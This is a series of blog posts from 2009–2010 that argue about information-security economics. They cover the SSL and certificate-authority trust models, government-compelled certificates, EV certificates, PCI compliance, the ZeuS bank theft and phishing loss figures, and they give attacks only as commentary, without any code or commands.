    Bradley Anstis, vice president of technology strategy at M86 Security, said the security firm uncovered the situation in late July while tracking how one ZeuS botnet had been specifically going after the U.K.-based bank and its customers. The botnet included a few hundred thousand PCs and even about 3,000 Apple Macs, and managed to steal funds from about 3,000 customer accounts through unauthorized transfers equivalent to roughly $892,755.

    Ouch!

    [4] I don't believe the 5% market share claim ... I harbour a suspicion that this is some very cunning PR trick in under-reporting by Apple, so as to fly below the radar. If so, I think it's well past its sell-by date since Apple reached the same market cap as Microsoft...

    [5] What is curious is that I'll bet most of Wall Street, and practically all of government, notwithstanding the "national security" argument, continue to keep clear of Macs. For those of us who know the trick, this is good. It is good for our security nation if the governments do not invest in Macs, and keep the monoculture effect positive. Perverse, but who am I to argue with the wisdom in cyber-security circles?

    Posted by iang at 09:30 AM | Comments (1) | TrackBack

    August 05, 2010

    Are we spending too little on security? Or are we spending too much??

    Luther Martin asks this open question:


    Ian,

    I have a quick question for you based on some recent discussions. Here's the background.

    The first was with a former co-worker who works for the VC division of a large commercial bank. He tells me that his bank really isn't interested in investing in security companies. Why? Apparently foreach $100 of credit card transactions there's about $4 of loss due to bad debt and about only $0.10 of loss due to fraud. So if you're making investments, it's clear where you should put your money.

    Next, I was talking with a guy who runs a large credit card processing business. He was complaining about having to spend an extra $6 million on fraud reduction while his annual losses due to fraud are only about $250K.

    Finally, I was also talking to some people from a government agency who were proud of the fact that they had reduced losses due to security incidents in their division by $2 million last year. The only problem is that they actually spent $10 million to do this.

    So the question is this: are we not spending enough on security or are we spending too much, but on the wrong things?

    Luther

    Posted by iang at 10:38 PM | Comments (6) | TrackBack

    August 01, 2010

    memes in infosec I - Eve and Mallory are missing, presumed dead

    Things I've seen that are encouraging. Bruce Schneier in Q&A:

    Q: We've also seen Secure Sockets Layer (SSL) come under attack, and some experts are saying it is useless. Do you agree?

    A: I'm not convinced that SSL has a problem. After all, you don't have to use it. If I log-on to Amazon without SSL the company will still take my money. The problem SSL solves is the man-in-the-middle attack with someone eavesdropping on the line. But I'm not convinced that's the most serious problem. If someone wants your financial data they'll hack the server holding it, rather than deal with SSL.

    Right. The essence is that SSL solves the "easy" part of the problem, and leaves open the biggest part. Before the proponents of SSL say, "not our problem," remember that AADS did solve it, as did SOX and a whole bunch of other things. It's called end-to-end, and is well known as being the only worthwhile security. Indeed, I'd say it was simply responsible engineering, except for the fact that it isn't widely practiced.

    OK, so this is old news, from around March, but it is worth declaring sanity:

    Q: But doesn't SSL give consumers confidence to shop online, and thus spur e-commerce?

    A: Well up to a point, but if you wanted to give consumers confidence you could just put a big red button on the site saying 'You're safe'. SSL doesn't matter. It's all in the database. We've got the threat the wrong way round. It's not someone eavesdropping on Eve that's the problem, it's someone hacking Eve's endpoint.

    Which is to say, if you are going to do anything to fix the problem, you have to look at the end-points. The only time you should look at the protocol, and the certificates, is how well they are protecting the end-points. Meanwhile, the SSL field continues to be one for security researchers to make headlines over. It's BlackHat time again:

    "The point is that SSL just doesn't do what people think it does," says Hansen, an security researcher with SecTheory who often goes by the name RSnake. Hansen split his dumptruck of Web-browsing bugs into three categories of severity: About half are low-level threats, 10 or so are medium, and two are critical. One example...

    Many observers in the security world have known this for a while, and everyone else has felt increasingly frustrated and despondent about the promise:

    There has been speculation that an organization with sufficient power would be able to get a valid certificate from one of the 170+ certificate authorities (CAs) that are installed by default in the typical browser and could then avoid this alert ....

    But how many CAs does the average Internet user actually need? Fourteen! Let me explain. For the past two weeks I have been using Firefox on Windows with a reduced set of CAs. I disabled ALL of them in the browser and re-enabled them one by one as necessary during my normal usage....


    On the one hand, SSL is the brand of security. On the other hand, it isn't the delivery of security; it simply isn't deployed in secure browsing to provide the user security that was advertised: you are on the site you think you are on. Only as we moved from a benign world to a fraud world, around 2003-2005, this has this been shown to matter. Bruce goes on:

    Q: So is encryption the wrong approach to take?

    A: This kind of issue isn't an authentication problem, it's a data problem. People are recognising this now, and seeing that encryption may not be the answer. We took a World War II mindset to the internet and it doesn't work that well. We thought encryption would be the answer, but it wasn't. It doesn't solve the problem of someone looking over your shoulder to steal your data.

    Indeed. Note that comment about the World War II mindset. It is the case that the entire 1990s generation of security engineers were taught from the military text book. The military assumes its nodes -- its soldiers, its computers -- are safe. And, it so happens, that when armies fight armies, they do real-life active MITMs against each other to gain local advantage. There are cases of this happening, and oddly enough, they'll even do it to civilians if they think they can (ask Greenpeace). And the economics is sane, sensible stuff, if we bothered to think about it: in war, the wire is the threat, the nodes are safe.

    However, adopting "the wire" as the weakness and Mallory as the Man-In-The-Middle, and Eve as the Eavesdropper as "the threat" in the Internet was a mistake. Even in the early 1990s, we knew that the node was the problem. Firstly, ever since the PC, nodes in commercial computing are controlled by (dumb) users not professional (soldiers). Who download shit from the net, not operate trusted military assets. Secondly, observation of known threats told us where the problems lay: floppy viruses were very popular, and phone-line attacks were about spoofing and gaining entry to an end-point. Nobody was bothering with "the wire," nobody was talking about snooping and spying and listening [*].

    The military model was the precise reverse of the Internet's reality.

    To conclude. There is no doubt about this in security circles: the SSL threat model was all wrong, and consequently the product was deployed badly.

    Where the doubt lies is how long it will take the software providers to realise that their world is upside down? It can probably only happen when everyone with credibility stands up and says it is so. For this, the posts shown here are very welcome. Let's hear more!


    [*] This is not entirely true. There is one celebrated case of an epidemic of eavesdropping over ethernets, which was passwords being exchanged over telnet and rsh connections. A case-study in appropriate use of security models follows...

    PS: Memes II - War! Infosec is WAR!

    Posted by iang at 04:33 PM | Comments (3) | TrackBack

    July 29, 2010

    The difference between 0 breaches and 0+delta breaches

    Seen on the net, by Dan Geer:

    The design goal for any security system is that the number of failures is small but non-zero, i.e., N>0. If the number of failures is zero, there is no way to disambiguate good luck from spending too much. Calibration requires differing outcomes.

    I've been trying for years to figure out a nice way to describe the difference between 0 failures, and some small number N>0 like 1 or 2 or 10 in a population of a million.

    Dan might have said it above: If the number of failures is zero, there is no way to disambiguate good luck from spending too much.

    Has he nailed it? It's certainly a lot tighter than my long efforts ... Once we get that key piece of information down, we can move on. As he does:

    Regulatory compliance, on the other hand, stipulates N==0 failures and is thus neither calibratable nor cost effective. Whether the cure is worse than the disease is an exercise for the reader.

    An insight! For regulatory compliance, I'd substitute public compliance, which includes all the media attention and reputation attacks.

    Posted by iang at 12:29 AM | Comments (6) | TrackBack

    May 28, 2010

    questioning infosec -- don't buy into professionalism, certifications, and other silver bullets

    Gunnar posts on the continuing sad saga of infosec:

    There's been a lot of threads recently about infosec certification, education and training. I believe in training for infosec, I have trained several thousand people myself. Greater knowledge, professionalism and skills definitely help, but are not enough by themselves.

    We saw in the case of the Great Recession and in Enron where the skilled, certified accounting and rating professions totally sold out and blessed bogus accounting practices and non-existent earning.

    Right. And this is an area where the predictions of economics are spot on. In Akerlof's seminal paper "the Market for Lemons," he predicts that the asymmetry of information can be helped by institutions. In the economics sense, institutions are non-trading, non-2-party market contractual arrangements of long standing to get stuff happening. Professionalism, training, certifications, etc all are slap-bang in the recommendations.

    So why don't they help? There's a simple answer: we aren't in the market for lemons! There's one key flaw: Lemons postulates that the seller knows and the buyer doesn't, and that simply doesn't apply to infosec. (Criteria #1) In the market for security, the seller knows about his tool, but he doesn't know whether it is fit for the buyer. In contrast, the salesman in Akerlof's market assumed correctly that a car was good for the buyer, so the problem really was sharing the secret information from the seller to the buyer. Used car warranties did that, by forcing the seller to reveal his real pricing.

    The buyer doesn't really know what he wants, and the seller has no better clue. Indeed, it may be that the buyer has more of a clue, and at least sometimes. So professionalism, certification, training and warranties isn't going to be the answer.

    Another way of looking at this is that in infosec, in common with all security markets (think defence, crime) there is a third party: the attacker. This is the party that really knows, so knowledge-based solutions without clear incorporation of the aggressor's knowledge aren't going to work. This is why buying the next generation stealth fighter is not really helpful when your attacker is a freedom fighter in an Asian hell-hole with an IED. But it's a lot more exciting to talk about.

    Which leads me to one controversial claim. If we can't get useful information from the seller, then the answer is, you've got to find it by yourself. It's your job, do it. And that's really what we mean by professionalism -- knowing when you can outsource something, and knowing when you can't.

    That's controversial because legions of infosec product suppliers will think they're out of a job, but that's not quite true. It just requires a shift in thinking, and a willingness to think about the buyer's welfare, not just his wallet. How do we improve the ability of the client to do their job? Which leads right back to education: it is possible to teach better security practices. It's also possible to teach better risk practices. And, it can be done on an organisation-wide basis. Indeed, this is one of the processes that Microsoft took in trying to escape their security nightmare: get rid of the security architecture silos and turn the security groups into education groups [1].

    So from this claim, why the flip into a conundrum. Why aren't certifications the answer? It's because certifications /are an institution/ and institutions are captured by one party or another. Usually, the sellers. Again a well-known prediction from economics: institutions to protect the buyer are generally captured by the seller in time (if not in the creation). I think this was by Stiglitz or Stigler, pointing to finance market regulation, again.

    A supplier of certifications needs friends in industry, which means they need to also sell the product of industry. It's hard to make friends selling contrarian advice, it is far more profitable selling middle-of-the-road advice about your partners [2]. "Let's start with SSL + firewalls ..." Nobody's going to say boo, just pass go, just collect the fees. In contrast:

    In short, the biggest problem in infosec is integration. Education around security engineering for integration would be most welcome.

    That's tough, from an institutional point of view.



    [1] Of course, even for Microsoft, bettering their internal capabilities was no silver bullet. They did get better, and it is viewed now that their latest products are more secure. FWIW. But, they still lost pole position last week, as Apple pipped Microsoft to become the world's biggest tech organisation, by market cap. Security played its part in that, and it is something of a rather stellar prediction that it still remains better /for your security/ to work with a Mac, because apparent Mac market shares are still low enough to earn a monoculture bounty for Apple users. Microsoft, keep trying, some are noticing, but no cigar as yet :)

    [2] E.g., I came across a certification and professional code of conduct that required you to sign up as promoting /best practices/. Yet, best practices are lowest-common-denominator, they are the set of uncontroversial products. We're automatically on the back foot, because we're encouraging an organisation to lower its own standards to best practices, and comply with whatever list someone finds off the net, and stop right there. Hopeless!

    Posted by iang at 10:16 PM | Comments (1) | TrackBack

    April 13, 2010

    Ruminations on the State of the Security Nation

    In an influential paper, Prof Ross Anderson proposes that the _Market for Lemons_ is a good fit for infosec. I disagree, because that market is predicated on the seller being informed, and the buyer not. I suggest the sellers are equally ill-informed, leading to the Market for Silver Bullets.

    Microsoft and RSA have just published some commissioned research by Forrester that provides some information, but it doesn't help to separate the positions:

    CISOs do not know how effective their security controls actually are. Regardless of information asset value, spending, or number of incidents observed, nearly every company rated its security controls to be equally effective — even though the number and cost of incidents varied widely. Even enterprises with a high number of incidents are still likely to imagine that their programs are “very effective.” We concluded that most enterprises do not actually know whether their data security programs work or not.

    Buyers remain uninformed, something we both agree on. Curiously, it isn't an entirely good match for Akerlof, as the buyer of a Lemon is uninformed before, and regrettably over-informed afterwards. No such for the CISO.

    Which leaves me with an empirical problem: how to show that the sellers are uninformed? I provide some anecdotes in that paper, but we would need more to settle the prediction.

    It should be possible to design an experiment to reveal this. For example, and drawing on the above logic, if a researcher were to ask similar questions of both the buyer and the seller, and be able to show lack of correlation between the supplier's claims, and the incident rate, that would say something.

    The immediate problem of course is, who would do this? Microsoft and RSA aren't going to, as they are sell-side, and their research was obviously focussed on their needs. Which means, it might be entirely accurate, but might not be entirely complete; they aren't likely to want to clearly measure their own performance.

    And, if there is one issue that is extremely prevalent in the world of information security, it is the lack of powerful and independent buy-side institutions who might be tempted to do independent research on the information base of the sellers.

    Oh well. moving on to the other conclusions:

    • Secrets comprise two-thirds of the value of firms’ information portfolios.
    • Compliance, not security, drives security budgets.
    • Firms focus on preventing accidents, but theft is where the money is.
    • The more valuable a firm’s information, the more incidents it will have.

    The second and third were also predicted in that paper.

    The last is hopefully common sense, but unfortunately as someone used to say, common sense isn't so common. Which brings me to Matt Blaze's rather good analysis of the threats to the net in 1995, as an afterword to Applied Cryptography, the seminal red book by Bruce Schneier:

    One of the most dangerous aspects of cryptology (and, by extension, of this book), is that you can almost measure it. Knowledge of key lengths, factoring methods, and cryptanalytic techniques make it possible to estimate (in the absence of a real theory of cipher design) the "work factor" required to break a particular cipher. It's all too tempting to misuse these estimates as if they were overall security metrics for the systems in which they are used. The real world offers the attacker a richer menu of options than mere cryptanalysis; often more worrisome are protocol attacks, Trojan horses, viruses, electromagnetic monitoring, physical compromise, blackmail and intimidation of key holders, operating system bugs, application program bugs, hardware bugs, user errors, physical eavesdropping, social engineering, and dumpster diving, to name just a few.

    Right. It must have not escaped anyone by now that the influence of cryptography has been huge, but the success in security has been minimal. Cryptography has not really been shown to secure our interactions that much, having missed the target as many times as it might have hit it. And with the rise of phishing and breaches and MITBs and trojans and so forth, we are now in the presence of evidence that the institutions of strong cryptography have cemented us into a sort of Maginot line mentality. So it may be doing more harm than good, although such a claim would need a lot of research to give it some weight.

    I tried to research this a little in Pareto-secure, in which I asked why the measurements of crypto-algorithms received such slavish attention, to the exclusion of so much else? I found an answer, at least, and it was a positive, helpful answer. But the far bigger question remains: what about all the things we can't measure with a bit-ruler?

    Matt Blaze listed 10 things in 1996:

    1. The sorry state of software.
    2. Ineffective protection against denial-of-service attacks.
    3. No place to store secrets.
    4. Poor random number generation.
    5. Weak passphrases.
    6. Mismatched trust.
    7. Poorly understood protocol and service interactions.
    8. Unrealistic threat and risks assessment.
    9. Interfaces that make security expensive and special.
    10. No broad-based demand for security.

    In 2010, today more or less, he said "not much has changed." We live in a world where if MD5 is shown to be a bit flaky because it has less bits than SHA1, the vigilantes of the net launch pogroms on the poor thing, committees of bitreaucrats write up how MD5-must-die, and the media breathlessly runs around claiming the sky will fall in. Even though none of this is true, and there is no attack possible at the moment, and when the attack is possible, it is still so unlikely that we can ignore it ... and even if it does happen, the damages will be next to zero.

    Meanwhile, if you ask for a user-interface change, because the failure of the user-interface to identify false end-points has directly led to billions of dollars of damages, you can pretty much forget any discussion. For some reason, bit-strength dominates dollars-losses, in every conversation.

    I used to be one of those who gnashed my teeth at the sheer success of Applied Cryptography, and the consequent generation of crypto-amateurs who believed that the bit count was the beginning and end of all. But that's unfair, as I never got as far as reading the afterword, and the message is there. It looks like Bruce made a slight error, and should have made Matt Blaze's contribution the foreword, not the afterword.

    A one-word error in the editorial algorithm! I must write to the committee...

    Afterword: rumour has it that the 3rd edition of Applied Cryptography is nearing publication.

    Posted by iang at 02:25 AM | Comments (1) | TrackBack

    March 29, 2010

    Pushing the CA into taking responsibility for the MITM

    This ArsTechnica article explores what happens when the CA-supplied certificate is used as an MITM over some SSL connection to protect online-banking or similar. In the secure-lite model that emerged after the real-estate wars of the mid-1990s, consumers were told to click on their tiny padlock to check the cert:

    Now, a careful observer might be able to detect this. Amazon's certificate, for example, should be issued by VeriSign. If it suddenly changed to be signed by Etisalat (the UAE's national phone company), this could be noticed by someone clicking the padlock to view the detailed certificate information. But few people do this in practice, and even fewer people know who should be issuing the certificates for a given organization.

    Right, so where does this go? Well, people don't notice because they can't. Put the CA on the chrome and people will notice. What then?

    A switch in CA is a very significant event. Jane Public might not be able to do something, but if a customer of Verisign's was MITM'd by a cert from Etisalat, this is something that effects Verisign. We might reasonably expect Verisign to be interested in that. As it effects the chrome, and as customers might get annoyed, we might even expect Verisign to treat this as an attack on their good reputation.

    And that's why putting the brand of the CA onto the chrome is so important: it's the only real way to bring pressure to bear on a CA to get it to lift its game. Security, reputation, sales. These things are all on the line when there is a handle to grasp by the public.

    When the public has no handle on what is going on, the deal falls back into the shadows. No security there, in the shadows we find audit, contracts, outsourcing. Got a problem? Shrug. It doesn't effect our sales.

    So, what happens when a CA MITM's its own customer?

    Even this is limited; if VeriSign issued the original certificate as well as the compelled certificate, no one would be any the wiser. The researchers have devised a Firefox plug-in that should be released shortly that will attempt to detect particularly unusual situations (such as a US-based company with a China-issued certificate), but this is far from sufficient.

    Arguably, this is not an MITM, because the CA is the authority (not the subscriber) ... but exotic legal arguments aside; we clearly don't want it. When it goes on, what we do need is software like whitelisting, like Conspiracy and like the other ideas floating around to do it.

    And, we need the CA-on-the-chrome idea so that the responsibility aspect is established. CAs shouldn't be able to MITM other CAs. If we can establish that, with teeth, then the CA-against-itself case is far easier to deal with.

    Posted by iang at 11:20 PM | Comments (7) | TrackBack

    March 24, 2010

    Why the browsers must change their old SSL security (?) model

    In a paper Certified Lies: Detecting and Defeating Government Interception Attacks Against SSL_, by Christopher Soghoian and Sid Stammby, there is a reasonably good layout of the problem that browsers face in delivering their "one-model-suits-all" security model. It is more or less what we've understood all these years, in that by accepting an entire root list of 100s of CAs, there is no barrier to any one of them going a little rogue.

    Of course, it is easy to raise the hypothetical of the rogue CA, and even to show compelling evidence of business models (they cover much the same claims with a CA that also works in the lawful intercept business that was covered here in FC many years ago). Beyond theoretical or probable evidence, it seems the authors have stumbled on some evidence that it is happening:

    The company’s CEO, Victor Oppelman confirmed, in a conversation with the author at the company’s booth, the claims made in their marketing materials: That government customers have compelled CAs into issuing certificates for use in surveillance operations. While Mr Oppelman would not reveal which governments have purchased the 5-series device, he did confirm that it has been sold both domestically and to foreign customers.

    (my emphasis.) This has been a lurking problem underlying all CAs since the beginning. The flip side of the trusted-third-party concept ("TTP") is the centralised-vulnerability-party or "CVP". That is, you may have been told you "trust" your TTP, but in reality, you are totally vulnerable to it. E.g., from the famous Blackberry "official spyware" case:

    Nevertheless, hundreds of millions of people around the world, most of whom have never heard of Etisalat, unknowingly depend upon a company that has intentionally delivered spyware to its own paying customers, to protect their own communications security.

    Which becomes worse when the browsers insist, not without good reason, that the root list is hidden from the consumer. The problem that occurs here is that the compelled CA problem multiplies to the square of the number of roots: if a CA in (say) Ecuador is compelled to deliver a rogue cert, then that can be used against a CA in Korea, and indeed all the other CAs. A brief examination of the ways in which CAs work, and browsers interact with CAs, leads one to the unfortunate conclusion that nobody in the CAs, and nobody in the browsers, can do a darn thing about it.

    So it then falls to a question of statistics: at what point do we believe that there are so many CAs in there, that the chance of getting away with a little interception is too enticing? Square law says that the chances are say 100 CAs squared, or 10,000 times the chance of any one intercept. As we've reached that number, this indicates that the temptation to resist intercept is good for all except 0.01% of circumstances. OK, pretty scratchy maths, but it does indicate that the temptation is a small but not infinitesimal number. A risk exists, in words, and in numbers.

    One CA can hide amongst the crowd, but there is a little bit of a fix to open up that crowd. This fix is to simply show the user the CA brand, to put faces on the crowd. Think of the above, and while it doesn't solve the underlying weakness of the CVP, it does mean that the mathematics of squared vulnerability collapses. Once a user sees their CA has changed, or has a chance of seeing it, hiding amongst the crowd of CAs is no longer as easy.

    Why then do browsers resist this fix? There is one good reason, which is that consumers really don't care and don't want to care. In more particular terms, they do not want to be bothered by security models, and the security displays in the past have never worked out. Gerv puts it this way in comments:

    Security UI comes at a cost - a cost in complexity of UI and of message, and in potential user confusion. We should only present users with UI which enables them to make meaningful decisions based on information they have.

    They love Skype, which gives them everything they need without asking them anything. Which therefore should be reasonable enough motive to follow those lessons, but the context is different. Skype is in the chat & voice market, and the security model it has chosen is well-excessive to needs there. Browsing on the other hand is in the credit-card shopping and Internet online banking market, and the security model imposed by the mid 1990s evolution of uncontrollable forces has now broken before the onslaught of phishing & friends.

    In other words, for browsing, the writing is on the wall. Why then don't they move? In a perceptive footnote, the authors also ponder this conundrum:

    3. The browser vendors wield considerable theoretical power over each CA. Any CA no longer trusted by the major browsers will have an impossible time attracting or retaining clients, as visitors to those clients’ websites will be greeted by a scary browser warning each time they attempt to establish a secure connection. Nevertheless, the browser vendors appear loathe to actually drop CAs that engage in inappropriate be- havior — a rather lengthy list of bad CA practices that have not resulted in the CAs being dropped by one browser vendor can be seen in [6].

    I have observed this for a long time now, predicting phishing until it became the flood of fraud. The answer is, to my mind, a complicated one which I can only paraphrase.

    For Mozilla, the reason is simple lack of security capability at the *architectural* and *governance* levels. Indeed, it should be noticed that this lack of capability is their policy, as they deliberately and explicitly outsource big security questions to others (known as the "standards groups" such as IETF's RFC committees). As they have little of the capability, they aren't in a good position to use the power, no matter whether they would want to or not. So, it only needs a mildly argumentative approach on the behalf of the others, and Mozilla is restrained from its apparent power.

    What then of Microsoft? Well, they certainly have the capability, but they have other fish to fry. They aren't fussed about the power because it doesn't bring them anything of use to them. As a corporation, they are strictly interested in shareholders' profits (by law and by custom), and as nobody can show them a bottom line improvement from CA & cert business, no interest is generated. And without that interest, it is practically impossible to get the various many groups within Microsoft to move.

    Unlike Mozilla, my view of Microsoft is much more "external", based on many observations that have never been confirmed internally. However it seems to fit; all of their security work has been directed to market interests. Hence for example their work in identity & authentication (.net, infocard, etc) was all directed at creating the platform for capturing the future market.

    What is odd is that all CAs agree that they want their logo on their browser real estate. Big and small. So one would think that there was a unified approach to this, and it would eventually win the day; the browser wins for advancing security, the CAs win because their brand investments now make sense. The consumer wins for both reasons. Indeed, early recommendations from the CABForum, a closed group of CAs and browsers, had these fixes in there.

    But these ideas keep running up against resistance, and none of the resistance makes any sense. And that is probably the best way to think of it: the browsers don't have a logical model for where to go for security, so anything leaps the bar when the level is set to zero.

    Which all leads to a new group of people trying to solve the problem. The authors present their model as this:

    The Firefox browser already retains history data for all visited websites. We have simply modified the browser to cause it to retain slightly more information. Thus, for each new SSL protected website that the user visits, a Certlock enabled browser also caches the following additional certificate information:
    A hash of the certificate.
    The country of the issuing CA.
    The name of the CA.
    The country of the website.
    The name of the website.
    The entire chain of trust up to the root CA.

    When a user re-visits a SSL protected website, Certlock first calculates the hash of the site’s certificate and compares it to the stored hash from previous visits. If it hasn’t changed, the page is loaded without warning. If the certificate has changed, the CAs that issued the old and new certificates are compared. If the CAs are the same, or from the same country, the page is loaded without any warning. If, on the other hand, the CAs’ countries differ, then the user will see a warning (See Figure 3).

    This isn't new. The authors credit recent work, but no further back than a year or two. Which I find sad because the important work done by TrustBar and Petnames is pretty much forgotten.

    But it is encouraging that the security models are battling it out, because it gets people thinking, and challenging their assumptions. Only actual produced code, and garnered market share is likely to change the security benefits of the users. So while we can criticise the country approach (it assumes a sort of magical touch of law within the countries concerned that is already assumed not to exist, by dint of us being here in the first place), the country "proxy" is much better than nothing, and it gets us closer to the real information: the CA.

    From a market for security pov, it is an interesting period. The first attempts around 2004-2006 in this area failed. This time, the resurgence seems to have a little more steam, and possibly now is a better time. In 2004-2006 the threat was seen as more or less theoretical by the hoi polloi. Now however we've got governments interested, consumers sick of it, and the entire military-industrial complex obsessed with it (both in participating and fighting). So perhaps the newcomers can ride this wave of FUD in, where previous attempts drowned far from the shore.

    Posted by iang at 07:52 PM | Comments (1) | TrackBack

    February 10, 2010

    EV's green cert is breached (of course) (SNAFU)

    Reading up on something or other (Ivan Ristić), I stumbled on this EV breach by Adrian Dimcev:

    Say you go to https://addons.mozilla.org and download a popular extension. Maybe NoScript. The download location appears to be over HTTPS. ... (lots of HTTP/HTTPS blah blah) ... Today I had some time, so I’ve decided to play a little with this. ...

    Well, Wladimir Palant is now the author of NoScript, and of course, I’m downloading it over HTTPS.

    Boom! Mozilla's website uses an EV ("extended validation") certificate to present to the user that this is a high security site, or something. However, it provided the downloads over HTTP, and this was easily manipulable. Hence, NoScript (which I use) was hit by an MITM, and this might explain why Robert Hansen said that the real author of NoScript, Giorgio Maone, was the 9th most dangerous person on the planet.

    What's going on here? Well, several things. The promise that the web site makes when it displays the green EV certificate is just that: a promise. The essence of the EV promise is that it is somehow of a stronger quality than say raw unencrypted HTTP.

    EV checks identity to the Nth degree, which is why it is called "extended validation." Checking the identity is useful, but no more than is matched by a balance in overall security, so the difference between ordinary certs and EV is mostly irrelevant. In simple security model terms, that's not where the threats are (or ever were), so they are winding up the wrong knob. In economics terms, EV raises the cost barrier, which is classical price discrimination, and this results in a colourful signal, not a metric or measure. The marketing aligns the signal of green to security, but the attack easily splits security from promise. Worse, the more they wind the knob, the more they drift off topic, as per silver bullets hypothesis.

    If you want to put it in financial or payments context, EV should be like PCI, not like KYC.

    But it isn't, it's the gold-card of KYC. So, how easy is it to breach the site itself and render the promise a joke? Well, this is the annoying part. Security practices in the HTTP world today are so woeful that even if you know a lot, and even if you try hard to make it secure, the current practices are terrifically hard to secure. Basically, complexity is the enemy of security, and complexity is too high in the world of websites & browsers.

    So CABForum, the promoters of EV, fell into the trap of tightening the identity knob up so much, to increase the promise of security ... but didn't look at all at the real security equation on which it is dependent. So, it is a strong brand over a weak product, it's green paint over wood rot. Worse for them, they won't ever rectify this, because the solutions are out of their reach: they cannot weaken the identity promise without causing the bureaucrats to attack them, and they cannot improve the security of the foundation without destroying the business model.

    Which brings us to the real security question. What's the easiest fix? It is:

    there is only one mode, and it is secure.

    Now, hypothetically, we could see a possibility of saving EV if the CABForum contracts were adjusted such that they enforce this dictum. In practical measures, it would be a restriction that an EV-protected website would only communicate over EV, there would be no downgrade possible. Not to Blue HTTPS, not to white HTTP. This would include all downloads, all javascript, all mashups, all off-site blah blah.

    And that would be the first problem with securing the promise: EV is sold as a simple identity advertisement, it does not enter into the security business at all. So this would make a radical change in the sales process, and it's not clear it would survive the transition.

    Secondly, CABForum is a cartel of people who are in the sales business. It's not security-wise but security-talk. So as a practical matter, the institution is not staffed with the people who are going to pick up this ball and run with it. It has a history of missing the target and claiming victory (c.f., phishing), so what would change its path now?

    That's not to say that EV is all bad, but here is an example of how CABForum succeeded and failed, as illustrative of their difficulties:

    EV achieved one thing, in that it put the brand name of the CA on the agenda. HTTPS security at the identity level is worthless unless the brand of the CA is shown. I haven't seen a Microsoft browser in a while, but the mock-ups showed the brand of the CA, so this gives the consumer a chance to avoid the obvious switcheroo from known brand to strange foreign thing, and recent breaches of various low-end commercial CAs indicate there isn't much consistency across the brands. (Or fake injection attacks, if one is worried about MITB.)

    So it is essential to any sense of security that the identity of who made the security statement be known to consumers; and CABForum tried to make this happen. Here's one well-known (branded) CA's display of the complete security statement.

    But Mozilla was a hold-out. (It is a mystery why Mozilla fights against the the complete security statement. I have a feeling it is more of the same problem that infects CABForum, Microsoft and the Internet in general; monoculture. Mozilla is staffed by developers who apparently think that brands are TV-adverts or road-side billboards of no value to their users, and Mozilla's mission is to protect their flock against another mass-media rape of consciousness & humanity by the evil globalised corporations ... rather than appreciating the brand as handles to security statements that mesh into an overall security model.)

    Which puts the example to the test: although CABForum was capable of winding the identity knob up to 11, and beyond, they were not capable of adjusting the guidelines to change the security model, and force the brand of the CA to be shown on the browser, in some sense. In these terms, what has now happened is that Mozilla is embarrassed, but zero fallback comes onto the CA. It was the CA that should have solved the problem in the first place, because the CA is in the sell-security business, Mozilla is not. So the CA should have adjusted contracts to control the environment in which the green could be displayed. Oops.

    Where do we go from here? Well, we'll probably see a lot of embarrassing attacks on EV ... the brand of EV will wobble, but still sell (mostly because consumers don't believe it anyway, because they know all security marketing is mostly talk [or, do they?], and corporates will try any advertising strategy, because most of them are unprovable anyway). But, gradually the embarrassments will add up to sufficient pressure to push the CABForum to entering the security business. (e.g., PCI not KYC.)

    The big question is, how long will this take, and will it actually do any good? If it takes 5-10 years, which I would predict, it will likely be overtaken by events, just as happened with the first round of security world versus phishing. It seems that we are in that old military story where our unfortunate user-soldiers are being shot up on the beaches while the last-war generals are still arguing as to what paint to put on the rusty ships. SNAFU, "situation normal, all futzed up," or in normal language, same as it ever was.

    Posted by iang at 12:23 PM | Comments (7) | TrackBack

    January 23, 2010

    load up on Steel, and shoot it out! PCI and the market for silver bullets

    Unusually, someone in the press wrote up a real controversy, called The Great PCI Security Debate of 2010. Exciting stuff! In this case, a bunch of security people including Bill Brenner, Ben Rothke, Anton Chuvakin and other famous names are arguing whether PCI is good or bad. The short story is that we are in the market for silver bullets, and this article nicely lays out the evidence:

    Let's just look at the security market: I did a market survey when I was at IBM and there were about 70 different security product technologies, not even counting services. How many of those are required by PCI? It's a tiny subset. No one invests in all 70.

    In this market, external factors are the driving force:

    But the truth is, when someone determined they had to do something about targeted attacks or data loss prevention for intellectual property, they had a pilot and a budget but their bosses told them to cut it. The reason was, "I might get hacked, but I will get fined." That's a direct quote from a CIO and it's very logical and business focused. But instead of securing their highest-risk priority they're doing the thing that they'll get fined for not doing.

    We don't "do security," rather, we avoid exposure to fingerpointing and other embarrassments. By way of hypotheses in the market for silver bullets, we then find ourselves seeking to reduce the exposure to those external costs; this causes the evolution of some form of best practices which is an agreed set that simply ensures you are not isolated by difference. In the case in point, this best practices is PCI.

    In other words, security by herding , compliance-seeking behaviour:

    One of the things I see within organizations is that there's a hurry-up-and-wait mentality. An organization will push really hard to get compliant. Then, the day the auditor walks out the door they say, "Thank goodness. Now I can wait until next year." So when we talk about compliance driving the wrong mindset, I think the wrong mindset was there to begin with.

    It's a difficult proposition to say we're doing compliance instead of security when what I see is they're doing compliance because someone told them to, whereas if no one told them to they'd do nothing. It's like telling your kids to do their homework. If you don't tell them to do the homework they're going to play outside all day.

    This is rational, we simply save more money doing that. What to do about it? If one is a consultant, one can sell more services:

    There is security outside of PCI and if we as security counselors aren't encouraging customers to look outside PCI then we ourselves are failing the industry because we're not encouraging them to look to good security as opposed to just good PCI compliance. The idea that they fear the auditor and not the attacker really bothers me.

    Which is of course rational for the adviser, but not rational for the buyer because more security likely reduces profits in this market. If on the other hand we are trying to make the market more efficient (generally a good goal, as this means it reduces the costs to all players) then the goal is simple: move the market for silver bullets into a market for lemons or limes.

    That's easy to say, very hard to do. There's at least one guy who doesn't want that to happen: the attacker. Furthermore, depending on your view of the perversion of incentives in the payment industry, fraud is good for profits because it enables building of margin. Our security adviser has the same perverse incentive: the more fraud, the more jobs. Indeed, everyone is positive about it, except the user, and they get the bill, not the vote.

    I see a bright future for PCI. To put it in literary terms:

    Ben Rothke: Dan Geer is the Shakespeare of information security, but at the end of the day people are reading Danielle Steel, not Shakespeare.

    In the market for silver bullets, you don't need to talk like Shakespeare. Load up on bullets of Steel, or as many other mangled metaphors as you can cram in, and you're good to shoot it out with the rest of 'em.

    Posted by iang at 08:23 AM | Comments (0) | TrackBack

    December 05, 2009

    Phishing numbers

    From a couple of sources posted by Lynn:

    • A single run only hits 0.0005 percent of users,
    • 1% of customers will follow the phishing links.
    • 0.5% of customers fall for phishing schemes and compromise their online banking information.
    • the monetary losses could range between $2.4 million and $9.4 million annually per one million online banking clients
